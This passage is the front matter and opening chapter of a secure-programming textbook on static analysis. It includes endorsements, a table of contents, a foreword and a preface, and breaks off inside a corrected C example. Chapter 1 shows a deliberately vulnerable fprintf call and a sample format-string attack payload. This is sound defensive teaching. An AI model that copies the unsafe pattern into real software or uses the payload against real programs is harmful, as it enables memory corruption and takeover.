Secure Programming with Static Analysis.pdf

  • Date: 2014-06-13
  • Size: 4.71MB

Praise for Secure Programming with Static Analysis

“We designed Java so that it could be analyzed statically. This book shows you how to apply advanced static analysis techniques to create more secure, more reliable software.”
-- Bill Joy, Co-founder of Sun Microsystems, co-inventor of the Java programming language

“If you want to learn how promising new code-scanning tools can improve the security of your software, then this is the book for you. The first of its kind, Secure Programming with Static Analysis is well written and tells you what you need to know without getting too bogged down in details. This book sets the standard.”
-- David Wagner, Associate Professor, University of California, Berkeley

“Brian and Jacob can write about software security from the ‘been there. done that.’ perspective. Read what they’ve written - it’s chock full of good advice.”
-- Marcus Ranum, Inventor of the firewall, Chief Scientist, Tenable Security

“Over the past few years, we’ve seen several books on software security hitting the bookstores, including my own. While they’ve all provided their own views of good software security practices, this book fills a void that none of the others have covered. The authors have done a magnificent job at describing in detail how to do static source code analysis using all the tools and technologies available today. Kudos for arming the developer with a clear understanding of the topic as well as a wealth of practical guidance on how to put that understanding into practice. It should be on the required reading list for anyone and everyone developing software today.”
-- Kenneth R. van Wyk, President and Principal Consultant, KRvW Associates, LLC.

“Software developers are the first and best line of defense for the security of their code. This book gives them the security development knowledge and the tools they need in order to eliminate vulnerabilities before they move into the final products that can be exploited.”
-- Howard A. Schmidt, Former White House Cyber Security Advisor

“Modern artifacts are built with computer assistance. You would never think to build bridges, tunnels, or airplanes without the most sophisticated, state of the art tools. And yet, for some reason, many programmers develop their software without the aid of the best static analysis tools. This is the primary reason that so many software systems are replete with bugs that could have been avoided. In this exceptional book, Brian Chess and Jacob West provide an invaluable resource to programmers. Armed with the hands-on instruction provided in Secure Programming with Static Analysis, developers will finally be in a position to fully utilize technological advances to produce better code. Reading this book is a prerequisite for any serious programming.”
-- Avi Rubin, Ph.D., Professor of Computer Science, Johns Hopkins University; President and co-Founder, Independent Security Evaluators

“Once considered an optional afterthought, application security is now an absolute requirement. Bad guys will discover how to abuse your software in ways you’ve yet to imagine, costing your employer money and damaging its reputation. Brian Chess and Jacob West offer timely and salient guidance to design security and resiliency into your applications from the very beginning. Buy this book now and read it tonight.”
-- Steve Riley, Senior Security Strategist, Trustworthy Computing, Microsoft Corporation

“Full of useful code examples, this book provides the concrete, technical details you need to start writing secure software today. Security bugs can be difficult to find and fix, so Chess and West show us how to use static analysis tools to reliably find bugs and provide code examples demonstrating the best ways to fix them.
Secure Programming with Static Analysis is an excellent book for any software engineer and the ideal code-oriented companion book for McGraw’s process-oriented Software Security in a software security course.”
-- James Walden, Assistant Professor of Computer Science, Northern Kentucky University

“Brian and Jacob describe the root cause of many of today’s most serious security issues from a unique perspective: static source code analysis. Using lots of real-world source code examples combined with easy-to-understand theoretical analysis and assessment, this book is the best I’ve read that explains code vulnerabilities in such a simple yet practical way for software developers.”
-- Dr. Gang Cheng

“Based on their extensive experience in both the software industry and academic research, the authors illustrate sound software security practices with solid principles. This book distinguishes itself from its peers by advocating practical static analysis, which I believe will have a big impact on improving software security.”
-- Dr. Hao Chen, Assistant Professor of Computer Science, UC Davis

Addison-Wesley Software Security Series
Gary McGraw, Consulting Editor

Titles in the Series

Secure Programming with Static Analysis, by Brian Chess and Jacob West. ISBN: 0-321-42477-8
Exploiting Software: How to Break Code, by Greg Hoglund and Gary McGraw. ISBN: 0-201-78695-8
Exploiting Online Games: Cheating Massively Distributed Systems, by Greg Hoglund and Gary McGraw. ISBN: 0-132-27191-5
Rootkits: Subverting the Windows Kernel, by Greg Hoglund and James Butler. ISBN: 0-321-29431-9
Software Security: Building Security In, by Gary McGraw. ISBN: 0-321-35670-5

For more information about these titles, and to read sample chapters, please visit the series web site.

Secure Programming with Static Analysis

Brian Chess
Jacob West

Upper Saddle River, NJ • Boston • Indianapolis • San Francisco • New York • Toronto • Montreal • London • Munich • Paris • Madrid • Cape Town • Sydney • Tokyo • Singapore • Mexico City

Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in this book, and the publisher was aware of a trademark claim, the designations have been printed with initial capital letters or in all capitals.

The authors and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for incidental or consequential damages in connection with or arising out of the use of the information or programs contained herein.

The publisher offers excellent discounts on this book when ordered in quantity for bulk purchases or special sales, which may include electronic versions and/or custom covers and content particular to your business, training goals, marketing focus, and branding interests. For more information, please contact: U.S.
Corporate and Government Sales, (800) 382-3419

For sales outside the United States, please contact: International Sales

Library of Congress Cataloging-in-Publication Data:
Chess, Brian.
Secure programming with static analysis / Brian Chess.
p. cm.
Includes bibliographical references and index.
ISBN 0-321-42477-8
1. Computer security. 2. Debugging in computer science. 3. Computer software--Quality control. I. Title.
QA76.9.A25C443 2007
005.8--dc22
2007010226

Copyright © 2007 Pearson Education, Inc.

All rights reserved. Printed in the United States of America. This publication is protected by copyright, and permission must be obtained from the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information regarding permissions, write to:

Pearson Education, Inc.
Rights and Contracts Department
75 Arlington Street, Suite 300
Boston, MA 02116
Fax: (617) 848-7047

ISBN 0-321-42477-8

Text printed in the United States on recycled paper at R. R. Donnelley in Crawfordsville, Indiana.
First printing, June 2007

To Sally and Simon, with love.
-- Brian

In memory of the best teacher I ever had, my Dad.
-- Jacob

Contents

Part I: Software Security and Static Analysis

1 The Software Security Problem
  1.1 Defensive Programming Is Not Enough
  1.2 Security Features != Secure Features
  1.3 The Quality Fallacy
  1.4 Static Analysis in the Big Picture
  1.5 Classifying Vulnerabilities
    The Seven Pernicious Kingdoms
  1.6 Summary

2 Introduction to Static Analysis
  2.1 Capabilities and Limitations of Static Analysis
  2.2 Solving Problems with Static Analysis
    Type Checking
    Style Checking
    Program Understanding
    Program Verification and Property Checking
    Bug Finding
    Security Review
  2.3 A Little Theory, a Little Reality
    Success Criteria
    Analyzing the Source vs. Analyzing Compiled Code
  Summary

3 Static Analysis as Part of the Code Review Process
  3.1 Performing a Code Review
    The Review Cycle
    Steer Clear of the Exploitability Trap
  3.2 Adding Security Review to an Existing Development Process
    Adoption Anxiety
    Start Small, Ratchet Up
  3.3 Static Analysis Metrics
  Summary

4 Static Analysis Internals
  4.1 Building a Model
    Lexical Analysis
    Parsing
    Abstract Syntax
    Semantic Analysis
    Tracking Control Flow
    Tracking Dataflow
    Taint Propagation
    Pointer Aliasing
  4.2 Analysis Algorithms
    Checking Assertions
    Naïve Local Analysis
    Approaches to Local Analysis
    Global Analysis
    Research Tools
  4.3 Rules
    Rule Formats
    Rules for Taint Propagation
    Rules in Print
  4.4 Reporting Results
    Grouping and Sorting Results
    Eliminating Unwanted Results
    Explaining the Significance of the Results
  Summary

Part II: Pervasive Problems

5 Handling Input
  5.1 What to Validate
    Validate All Input
    Validate Input from All Sources
    Establish Trust Boundaries
  5.2 How to Validate
    Use Strong Input Validation
    Avoid Blacklisting
    Don’t Mistake Usability for Security
    Reject Bad Data
    Make Good Input Validation the Default
    Check Input Length
    Bound Numeric Input
  5.3 Preventing Metacharacter Vulnerabilities
    Use Parameterized Requests
    Path Manipulation
    Command Injection
    Log Forging
  Summary

6 Buffer Overflow
  6.1 Introduction to Buffer Overflow
    Exploiting Buffer Overflow Vulnerabilities
    Buffer Allocation Strategies
    Tracking Buffer Sizes
  6.2 Strings
    Inherently Dangerous Functions
    Bounded String Operations
    Common Pitfalls with Bounded Functions
    Maintaining the Null Terminator
    Character Sets, Representations, and Encodings
    Format Strings
    Better String Classes and Libraries
  Summary

7 Bride of Buffer Overflow
  7.1 Integers
    Wrap-Around Errors
    Truncation and Sign Extension
    Conversion between Signed and Unsigned
    Methods to Detect and Prevent Integer Overflow
  7.2 Runtime Protection
    Safer Programming Languages
    Safer C Dialects
    Dynamic Buffer Overflow Protections
    Dynamic Protection Benchmark Results
  Summary

8 Errors and Exceptions
  8.1 Handling Errors with Return Codes
    Checking Return Values in C
    Checking Return Values in Java
  8.2 Managing Exceptions
    Catch Everything at the Top Level
    The Vanishing Exception
    Catch Only What You’re Prepared to Consume
    Keep Checked Exceptions in Check
  8.3 Preventing Resource Leaks
    C and C++
    Java
  8.4 Logging and Debugging
    Centralize Logging
    Keep Debugging Aids and Back-Door Access Code out of Production
    Clean Out Backup Files
    Do Not Tolerate Easter Eggs
  Summary

Part III: Features and Flavors

9 Web Applications
  9.1 Input and Output Validation for the Web
    Expect That the Browser Has Been Subverted
    Assume That the Browser Is an Open Book
    Protect the Browser from Malicious Content
  9.2 HTTP Considerations
    Use POST, Not GET
    Request Ordering
    Error Handling
    Request Provenance
  9.3 Maintaining Session State
    Use Strong Session Identifiers
    Enforce a Session Idle Timeout and a Maximum Session Lifetime
    Begin a New Session upon Authentication
  9.4 Using the Struts Framework for Input Validation
    Setting Up the Struts Validator
    Use the Struts Validator for All Actions
    Validate Every Parameter
    Maintain the Validation Logic
  Summary

10 XML and Web Services
  10.1 Working with XML
    Use a Standards-Compliant XML Parser
    Turn on Validation
    Be Cautious about External References
    Keep Control of Document Queries
  10.2 Using Web Services
    Input Validation
    WSDL Worries
    Over Exposure
    New Opportunities for Old Errors
    JavaScript Hijacking: A New Frontier
  Summary

11 Privacy and Secrets
  11.1 Privacy and Regulation
    Identifying Private Information
    Handling Private Information
  11.2 Outbound Passwords
    Keep Passwords out of Source Code
    Don’t Store Clear-Text Passwords
  11.3 Random Numbers
    Generating Random Numbers in Java
    Generating Random Numbers in C and C++
  11.4 Cryptography
    Choose a Good Algorithm
    Don’t Roll Your Own
  11.5 Secrets in Memory
    Minimize Time Spent Holding Secrets
    Share Secrets Sparingly
    Erase Secrets Securely
    Prevent Unnecessary Duplication of Secrets
  Summary

12 Privileged Programs
  12.1 Implications of Privilege
    Principle of Least Privilege
    This Time We Mean It: Distrust Everything
  12.2 Managing Privilege
    Putting Least Privilege into Practice
    Restrict Privilege on the Filesystem
    Beware of Unexpected Events
  12.3 Privilege Escalation Attacks
    File Access Race Conditions
    Insecure Temporary Files
    Command Injection
    Standard File Descriptors
  Summary

Part IV: Static Analysis in Practice

13 Source Code Analysis Exercises for Java
  Exercise 13.0 Installation
  Exercise 13.1 Begin with the End in Mind
  Exercise 13.2 Auditing Source Code Manually
  Exercise 13.3 Running Fortify SCA
  Exercise 13.4 Understanding Raw Analysis Results
  Exercise 13.5 Analyzing a Full Application
  Exercise 13.6 Tuning Results with Audit Workbench
  Exercise 13.7 Auditing One Issue
  Exercise 13.8 Performing a Complete Audit
  Exercise 13.9 Writing Custom Rules
  Answers to Questions in Exercise 13.2

14 Source Code Analysis Exercises for C
  Exercise 14.0 Installation
  Exercise 14.1 Begin with the End in Mind
  Exercise 14.2 Auditing Source Code Manually
  Exercise 14.3 Running Fortify SCA
  Exercise 14.4 Understanding Raw Analysis Results
  Exercise 14.5 Analyzing a Full Application
  Exercise 14.6 Tuning Results with Audit Workbench
  Exercise 14.7 Auditing One Issue
  Exercise 14.8 Performing a Complete Audit
  Exercise 14.9 Writing Custom Rules
  Answers to Questions in Exercise 14.2

Epilogue
References
Index

Foreword

Software Security and Code Review with a Static Analysis Tool

On the first day of class, mechanical engineers learn a critical lesson: Pay attention and learn this stuff, or the bridge you build could fall down. This lesson is most powerfully illustrated by a video of the Tacoma Narrows Bridge shaking itself to death ( tacoma.html). Figure 1 shows a 600-foot section of the bridge falling into the water in 1940. By contrast, on the first day of software engineering class, budding developers are taught that they can build anything that they can dream of. They usually start with “hello world.”

Figure 1. A 600-foot section of the Tacoma Narrows bridge crashes into Puget Sound as the bridge twists and torques itself to death. Mechanical engineers are warned early on that this can happen if they don’t practice good engineering.

An overly optimistic approach to software development has certainly led to the creation of some mind-boggling stuff, but it has likewise allowed us to paint ourselves into the corner from a security perspective. Simply put, we neglected to think about what would happen to our software if it were intentionally and maliciously attacked. Much of today’s software is so fragile that it barely functions properly when its environment is pristine and predictable. If the environment in which our fragile software runs turns out to be pugnacious and pernicious (as much of the Internet environment turns out to be), software fails spectacularly, splashing into the metaphorical Puget Sound.

The biggest problem in computer security today is that most systems aren’t constructed with security in mind.
Reactive network technologies such as firewalls can help alleviate obvious script kiddie attacks on servers, but they do nothing to address the real security problem: bad software. If we want to solve the computer security problem, we need to do more to build secure software.

Software security is the practice of building software to be secure and function properly under malicious attack. This book is about one of software security’s most important practices: code review with a static analysis tool.

As practitioners become aware of software security’s importance, they are increasingly adopting and evolving a set of best practices to address the problem. Microsoft has carried out a noteworthy effort under its Trustworthy Computing Initiative. Many Cigital customers are in the midst of enterprise scale software security initiatives. Most approaches in practice today encompass training for developers, testers, and architects; analysis and auditing of software artifacts; and security engineering. There’s no substitute for working software security as deeply into the development process as possible and taking advantage of the engineering lessons software practitioners have learned over the years. In my book Software Security, I introduce a set of seven best practices called touchpoints.

Putting software security into practice requires making some changes to the way most organizations build software. The good news is that these changes don’t need to be fundamental, earth shattering, or cost-prohibitive. In fact, adopting a straightforward set of engineering best practices, designed in such a way that security can be interleaved into existing development processes, is often all it takes.

Figure 2 specifies the software security touchpoints and shows how software practitioners can apply them to the various software artifacts produced during software development.
This means understanding how to work security engineering into requirements, architecture, design, coding, testing, validation, measurement, and maintenance.

[Figure 2 diagram. Touchpoint labels: code review (tools), risk analysis, penetration testing, risk-based security tests, abuse cases, security requirements, security operations, external review. Artifact labels: requirements and use cases, architecture and design, test plans, code, tests and test results, feedback from the field.]

Figure 2. The software security touchpoints as introduced and fleshed out in Software Security: Building Security In.

Some touchpoints are, by their very nature, more powerful than others. Adopting the most powerful ones first is only prudent. The top two touchpoints are code review with a static analysis tool and architectural risk analysis. This book is all about the first.

All software projects produce at least one artifact: code. This fact moves code review to the number one slot on our list. At the code level, the focus is on implementation bugs, especially those that static analysis tools that scan source code for common vulnerabilities can discover. Several tools vendors now address this space, including Fortify Software, the company that Brian and Jacob work for.

Implementation bugs are both numerous and common (just like real bugs in the Virginia countryside), and include nasty creatures such as the notorious buffer overflow, which owes its existence to the use (or misuse) of vulnerable APIs (e.g., gets(), strcpy(), and so on in C). Code review processes, both manual and (even more important) automated with a static analysis tool, attempt to identify security bugs prior to the software’s release.

Of course, no single technique is a silver bullet. Code review is a necessary but not sufficient practice for achieving secure software. Security bugs (especially in C and C++) are a real problem, but architectural flaws are just as big of a problem.
Doing code review alone is an extremely useful activity, but given that this kind of review can only identify bugs, the best a code review can uncover is around 50% of the security problems. Architectural problems are very difficult (and mostly impossible) to find by staring at code. This is especially true for modern systems made of hundreds of thousands of lines of code. A comprehensive approach to software security involves holistically combining both code review and architectural analysis.

By its very nature, code review requires knowledge of code. An infosec practitioner with little experience writing and compiling software will be of little use during a code review. The code review step is best left in the hands of the members of the development organization, especially if they are armed with a modern source code analysis tool. With the exception of information security people who are highly experienced in programming languages and code-level vulnerability resolution, there is no natural fit for network security expertise during the code review phase. This might come as a great surprise to organizations currently attempting to impose software security on their enterprises through the infosec division. Even though the idea of security enforcement is solid, making enforcement at the code level successful when it comes to code review requires real hands-on experience with code.

The problem is that most developers have little idea what bugs to look for, or what to do about bugs if they do find them. That’s where this book, Secure Programming with Static Analysis, comes in. The book that you have in your hands is the most advanced work on static analysis and code review for security ever released. It teaches you not only what the bugs are (what I sometimes call the “bug parade” approach to software security), but how to find them with modern static analysis tools and, more important, what to do to correct them.
By putting the lessons in this book into practice, you go a long way toward helping to solve the software security problem.

Gary McGraw, Ph.D.
Berryville, Virginia
March 6, 2007

Preface

Following the light of the sun, we left the Old World.
-- Christopher Columbus

We live in a time of unprecedented economic growth, increasingly fueled by computer and communications technology. We use software to automate factories, streamline commerce, and put information into the hands of people who can act upon it. We live in the information age, and software is the primary means by which we tame information. Without adequate security, we cannot realize the full potential of the digital age.

But oddly enough, much of the activity that takes place under the guise of computer security isn’t really about solving security problems at all; it’s about cleaning up the mess that security problems create. Virus scanners, firewalls, patch management, and intrusion detection systems are all means by which we make up for shortcomings in software security. The software industry puts more effort into compensating for bad security than it puts into creating secure software in the first place.

Do not take this to mean that we see no value in mechanisms that compensate for security failures. Just as every ship should have lifeboats, it is both good and healthy that our industry creates ways to quickly compensate for a newly discovered vulnerability. But the state of software security is poor. New vulnerabilities are discovered every day. In a sense, we’ve come to expect that we will need to use the lifeboats every time the ship sails.

Changing the state of software security requires changing the way software is built. This is not an easy task. After all, there are a limitless number of security mistakes that programmers could make! The potential for error might be limitless, but in practice, the programming community tends to repeat the same security mistakes.
Almost two decades of buffer overflow vulnerabilities serve as an excellent illustration of this point. In 1988, the Morris worm made the Internet programming community aware that a buffer overflow could lead to a security breach, but as recently as 2004, buffer overflow was the number one cause of security problems cataloged by the Common Vulnerabilities and Exposures (CVE) Project [CWE, 2006]. This significant repetition of well-known mistakes suggests that many of the security problems we encounter today are preventable and that the software community possesses the experience necessary to avoid them.

We are thrilled to be building software at the beginning of the twenty-first century. It must have felt this way to be building ships during the age of exploration. When Columbus came to America, exploration was the driving force behind economic expansion, and ships were the means by which explorers traveled the world. In Columbus’s day, being a world economic power required being a naval power because discovering a new land didn’t pay off until ships could safely travel the new trade routes. Software security has a similar role to play in today’s world. To make information technology pay off, people must trust the computer systems they use. Some pundits warn about an impending “cyber Armageddon,” but we don’t fear an electronic apocalypse nearly so much as we see software security as one of the primary factors that control the amount of trust people are willing to place in technology.

We believe that it is the responsibility of the people who create software to make sure that their creations are secure. Software security cannot be left to the system administrator or the end user. Network security, judicious administration, and wise use are all important, but in the long run, these endeavors cannot succeed if the software is inherently vulnerable.
Although security can sometimes appear to be a black art or a matter of luck, we hope to show that it is neither. Making security sound impossible or mysterious is giving it more than its due. With the right knowledge and the right tools, good software security can be achieved by building security in to the software development process.

We sometimes encounter programmers who question whether software security is a worthy goal. After all, if no one hacked your software yesterday, why would you believe they’ll hack it tomorrow? Security requires expending some extra thought, attention, and effort. This extra work wasn’t nearly so important in previous decades, and programmers who haven’t yet suffered security problems use their good fortune to justify continuing to ignore security.

In his investigation of the loss of the space shuttle Challenger, Richard Feynman found that NASA had based its risk assessment on the fact that previous shuttle missions had been successful [Feynman, 1986]. They knew anomalous behavior had taken place in the past, but they used the fact that no disaster had occurred yet as a reason to believe that no disaster would ever occur. The resulting erosion of safety margins made failure almost inevitable. Feynman writes, “When playing Russian roulette, the fact that the first shot got off safely is little comfort for the next.”

Secure Programming with Static Analysis

Two threads are woven throughout the book: software security and static source code analysis. We discuss a wide variety of common coding errors that lead to security problems, explain the security ramifications of each, and give advice for charting a safe course. Our most common piece of advice eventually found its way into the title of the book: Use static analysis tools to identify coding errors before they can be exploited.

Our focus is on commercial software for both businesses and consumers, but our emphasis is on business systems.
We won’t get into the details that are critical for building software for purposes that imply special security needs. A lot could be said about the specific security requirements for building an operating system or an electronic voting machine, but we encounter many more programmers who need to know how to build a secure Web site or enterprise application.

Above all else, we hope to offer practical and immediately practicable advice for avoiding software security pitfalls. We use dozens of real-world examples of vulnerable code to illustrate the pitfalls we discuss, and the book includes a static source code analysis tool on a companion CD so that readers can experiment with the detection techniques we describe.

The book is not a guide to using security features, frameworks, or APIs. We do not discuss the Java Security Manager, advanced cryptographic techniques, or the right approach to identity management. Clearly, these are important topics. They are so important, in fact, that they warrant books of their own. Our goal is to focus on things unrelated to security features that put security at risk when they go wrong.

In many cases, the devil is in the details. Security principles (and violations of security principles) have to be mapped to their manifestation in source code. We’ve chosen to focus on programs written in C and Java because they are the languages we most frequently encounter today. We see plenty of other languages, too. Security-sensitive work is being done in C#, Visual Basic, PHP, Perl, Python, Ruby, and COBOL, but it would be difficult to write a single book that could even scratch the surface with all these languages. In any case, many of the problems we discuss are language independent, and we hope that you will be able to look beyond the syntax of the examples to understand the ramifications for the languages you use.

Who Should Read the Book

This book is written for people who have decided to make software security a priority.
We hope that programmers, managers, and software architects will all benefit from reading it. Although we do not assume any detailed knowledge about software security or static analysis, we cover the subject matter in enough depth that we hope professional code reviewers and penetration testers will benefit, too. We do assume that you are comfortable programming in either C or Java, and that you won’t be too uncomfortable reading short examples in either language. Some chapters are slanted more toward one language than another. For instance, the examples in the chapters on buffer overflow are written in C.

How the Book Is Organized

The book is divided into four parts. Part I, “Software Security and Static Analysis,” describes the big picture: the software security problem, the way static analysis can help, and options for integrating static analysis as part of the software development process. Part II, “Pervasive Problems,” looks at pervasive security problems that impact software, regardless of its functionality, while Part III, “Features and Flavors,” tackles security concerns that affect common varieties of programs and specific software features. Part IV, “Static Analysis in Practice,” brings together Parts I, II, and III with a set of hands-on exercises that show how static analysis can improve software security.

Chapter 1, “The Software Security Problem,” outlines the software security dilemma from a programmer’s perspective: why security is easy to get wrong and why typical methods for catching bugs aren’t very effective when it comes to finding security problems.

Chapter 2, “Introduction to Static Analysis,” looks at the variety of problems that static analysis can solve, including structure, quality, and, of course, security. We take a quick tour of open source and commercial static analysis tools.

Chapter 3, “Static Analysis as Part of the Code Review Process,” looks at how static analysis tools can be put to work as part of a security review process.
We examine the organizational decisions that are essential to making effective use of the tools. We also look at metrics based on static analysis output. Chapter 4, “Static Analysis Internals,” takes an in-depth look at how static analysis tools work. We explore the essential components involved in building a tool and consider the trade-offs that tools make to achieve good precision and still scale to analyze millions of lines of code. Part II outlines security problems that are pervasive in software. Throughout the chapters in this section and the next, we give positive guidance for secure programming and then use specific code examples (many of them from real programs) to illustrate pitfalls to be avoided. Along the way, we point out places where static analysis can help. Chapter 5, “Handling Input,” addresses the most thorny software security topic that programmers have faced in the past, and the one they are most likely to face in the future: handling the many forms and flavors of untrustworthy input. Chapter 6, “Buffer Overflow,” and Chapter 7, “Bride of Buffer Overflow,” look at a single input-driven software security problem that has been with us for decades: buffer overflow. Chapter 6 begins with a tactical approach: how to spot the specific code constructs that are most likely to lead to an exploitable buffer overflow. Chapter 7 examines indirect causes of buffer overflow, such as integer wrap-around. We then step back and take a more strategic look at buffer overflow and possible ways that the problem can be tamed. Chapter 8, “Errors and Exceptions,” addresses the way programmers think about unusual circumstances. Although errors and exceptions are only rarely the direct cause of security vulnerabilities, they are often related to vulnerabilities in an indirect manner. The connection between unexpected conditions and security problems is so strong that error handling and recovery will always be a security topic.
At the end, the chapter discusses general approaches to logging and debugging, which are often integrally connected with error handling. Part III uses the same style of positive guidance and specific code examples to tackle security concerns found in common types of programs and related to specific software features. Chapter 9, “Web Applications,” looks at the most popular security topic of the day: the World Wide Web. We look at security problems that are specific to the Web and to the HTTP protocol. Chapter 10, “XML and Web Services,” examines a security challenge on the rise: the use of XML and Web Services to build applications out of distributed components. Although security features are not our primary focus, some security features are so error prone that they deserve special treatment. Chapter 11, “Privacy and Secrets,” looks at programs that need to protect private information and, more generally, the need to maintain secrets. Chapter 12, “Privileged Programs,” looks at the special security requirements that must be taken into account when writing a program that operates with a different set of privileges than the user who invokes it. Part IV is about gaining experience with static analysis. This book’s companion CD includes a static analysis tool, courtesy of our company, Fortify Software, and source code for a number of sample projects. Chapter 13, “Source Code Analysis Exercises for Java,” is a tutorial that covers static analysis from a Java perspective; Chapter 14, “Source Code Analysis Exercises for C,” does the same thing, but with examples and exercises written in C.

Conventions Used in the Book

Discussing security errors makes it easy to slip into a negative state of mind or to take a pessimistic outlook. We try to stay positive by focusing on what needs to be done to get security right.
Specifics are important, though, so when we discuss programming errors, we try to give a working example that demonstrates the programming mistake under scrutiny. When the solution to a particular problem is far removed from our original example, we also include a rewritten version that corrects the problem. To keep the examples straight, we use an icon to denote code that intentionally contains a weakness: We use a different icon to denote code where the weakness has been corrected: Other conventions used in the book include a monospaced font for code, both in the text and in examples. Acknowledgments Our editor at Addison-Wesley, Jessica Goldstein, has done more than just help us navigate the publishing process; a conversation with her at RSA 2005 got this project started. The rest of the crew at Addison-Wesley has been a great help (and very patient), too: Kristin Weinberger, Chris Zahn, Romny French, and Karen Gettman among others. Portions of Chapters 1, 2, and 3 have their roots in technical papers and journal articles we’ve written in the last few years. We are grateful to our coauthors on those projects: Gary McGraw, Yekaterina Tsipenyuk O’Neil, Pravir Chandra, and John Steven. Our reviewers suffered through some really rough rough drafts and always came back with constructive feedback. Many thanks to Gary McGraw, David Wagner, Geoff Morrison, Gary Hardy, Sean Fay, Richard Bejtlich, James Walden, Gang Cheng, Fredrick Lee, Steve Riley, and Hao Chen. We also received much-needed encouragement from Fortify’s technical advisory board, including Gary McGraw, Marcus Ranum, Avi Rubin, Fred Schneider, Matt Bishop, Li Gong, David Wagner, Greg Morrisett, Bill Pugh, and Bill Joy. Everyone at Fortify Software has been highly supportive of our work, and a significant amount of their work appears on the book’s companion CD. We are enormously grateful for the support we’ve received. 
We also owe a huge debt of gratitude to Greg Nelson, who has shaped our views on static analysis. Most of all, we give thanks to our families: Sally and Simon at Brian’s house, and Jonathan at Jacob’s house. It takes a lot of forbearance to live with someone who’s working at a Silicon Valley software company, and putting up with someone who’s writing software and writing a book at the same time is more than saintly. Finally, thanks to our parents. You set us down this road, and we wouldn’t want to be headed anywhere else.

About the Authors

Brian Chess is a founder of Fortify Software. He currently serves as Fortify’s Chief Scientist, where his work focuses on practical methods for creating secure systems. Brian holds a Ph.D. in Computer Engineering from the University of California at Santa Cruz, where he studied the application of static analysis to the problem of finding security-relevant defects in source code. Before settling on security, Brian spent a decade in Silicon Valley working at huge companies and small startups. He has done research on a broad set of topics, ranging from integrated circuit design all the way to delivering software as a service. He lives in Mountain View, California.

Jacob West manages Fortify Software’s Security Research Group, which is responsible for building security knowledge into Fortify’s products. Jacob brings expertise in numerous programming languages, frameworks, and styles together with knowledge about how real-world systems can fail. Before joining Fortify, Jacob worked with Professor David Wagner at the University of California at Berkeley to develop MOPS (MOdel Checking Programs for Security properties), a static analysis tool used to discover security vulnerabilities in C programs. When he is away from the keyboard, Jacob spends time speaking at conferences and working with customers to advance their understanding of software security. He lives in San Francisco, California.
PART I
Software Security and Static Analysis

Chapter 1 The Software Security Problem
Chapter 2 Introduction to Static Analysis
Chapter 3 Static Analysis as Part of the Code Review Process
Chapter 4 Static Analysis Internals

1 The Software Security Problem

Success is foreseeing failure.
- Henry Petroski

We believe that the most effective way to improve software security is to study past security errors and prevent them from happening in the future. In fact, that is the primary theme of this book. In the following chapters, we look at a variety of programming tasks and examine the common security pitfalls associated with them. Our philosophy is similar to that of Henry Petroski: To build a strong system, you have to understand how the system is likely to fail [Petroski, 1985]. Mistakes are inevitable, but you have a measure of control over your mistakes. Although you can’t have precise knowledge of your next blunder, you can control the set of possibilities. You can also control where, when, and by whom your mistake will be found. This book focuses on finding mistakes that manifest themselves in source code. In particular, it concentrates on mistakes that lead to security problems, which can be both tricky to uncover and costly to ignore.

Being aware of common pitfalls might sound like a good way to avoid falling prey to them, but awareness by itself often proves to be insufficient. Children learn the spelling rule “i before e except after c,” but widespread knowledge of the rule does not prevent believe from being a commonly misspelled word. Understanding security is one thing; applying your understanding in a complete and consistent fashion to meet your security goals is quite another. For this reason, we advocate static analysis as a technique for finding common security errors in source code.
Throughout the book, we show how static analysis tools can be part of a strategy for getting security right.

The term static analysis refers to any process for assessing code without executing it. Static analysis is powerful because it allows for the quick consideration of many possibilities. A static analysis tool can explore a large number of “what if” scenarios without having to go through all the computations necessary to execute the code for all the scenarios. Static analysis is particularly well suited to security because many security problems occur in corner cases and hard-to-reach states that can be difficult to exercise by actually running the code. Good static analysis tools provide a fast way to get a consistent and detailed evaluation of a body of code.

Advanced static analysis tools are not yet a part of the toolkit that most programmers use on a regular basis. To explain why they should be, we begin by looking at why some commonly used approaches to security typically fail. We discuss defensive programming, software security versus security features, and mistaking software quality efforts for software security efforts. Of course, no single tool or technique will ever provide a complete solution to the security problem by itself. We explain where static analysis fits into the big picture and then end the chapter by categorizing the kinds of mistakes that most often jeopardize software security.

1.1 Defensive Programming Is Not Enough

The term defensive programming often comes up in introductory programming courses. Although it is increasingly given a security connotation, historically it has referred only to the practice of coding with the mindset that errors are inevitable and that, sooner or later, something will go wrong and lead to unexpected conditions within the program. Kernighan and Plauger call it “writing the program so it can cope with small disasters” [Kernighan and Plauger, 1981].
Good defensive programming requires adding code to check one’s assumptions. The term defensive programming is apt, particularly in introductory programming courses, because often novice programmers are their own worst enemy; by and large, the defenses serve to reveal logic errors made by the programmer. Good defensive programming makes bugs both easier to find and easier to diagnose. But defensive programming does not guarantee secure software (although the notion of expecting anomalies is very much a step in the right direction).

When we talk about security, we assume the existence of an adversary: someone who is intentionally trying to subvert the system. Instead of trying to compensate for typical kinds of accidents (on the part of either the programmer or the user), software security is about creating programs that behave correctly even in the presence of malicious behavior.

Consider the following C function that prints a message to a specified file stream without performing any error checking:

    void printMsg(FILE* file, char* msg) {
      fprintf(file, msg);
    }

If either argument to this function is null, the program will crash. Programming defensively, we might check to make sure that both input parameters are non-null before printing the message, as follows:

    void printMsg(FILE* file, char* msg) {
      if (file == NULL) {
        logError("attempt to print message to null file");
      } else if (msg == NULL) {
        logError("attempt to print null message");
      } else {
        fprintf(file, msg);
      }
    }

From a security perspective, these checks simply do not go far enough. Although we have prevented a caller from crashing the program by providing null values, the code does not account for the fact that the value of the msg parameter itself might be malicious. By providing msg as the format string argument to fprintf(), the code leaves open the possibility that an attacker could specify a malicious format string designed to carry out a format string attack.
(Chapter 6, “Buffer Overflow,” discusses format string vulnerabilities in detail.) If an attacker can slip in a message that looks something like this, the attacker could potentially take control of the program:

    AAA1_%08x.%08x.%08x.%08x.%08x.%n

This attempt at defensive programming shows how a straightforward approach to solving a programming problem can turn out to be insecure. The people who created the programming languages, libraries, frameworks, protocols, and conventions that most programmers build upon did not anticipate all the ways their creations would be assailed. Because of a design oversight, format strings became an attack vector, and seemingly reasonable attempts at error handling turn out to be inadequate in the face of attack.

A security-conscious programmer will deprive an attacker of the opportunity this vulnerability represents by supplying a fixed format string.

    void printMsg(FILE* file, char* msg) {
      if (file == NULL) {
        logError("attempt to print message to null file");
      } else if (msg == NULL) {
        logError("attempt to print null message");
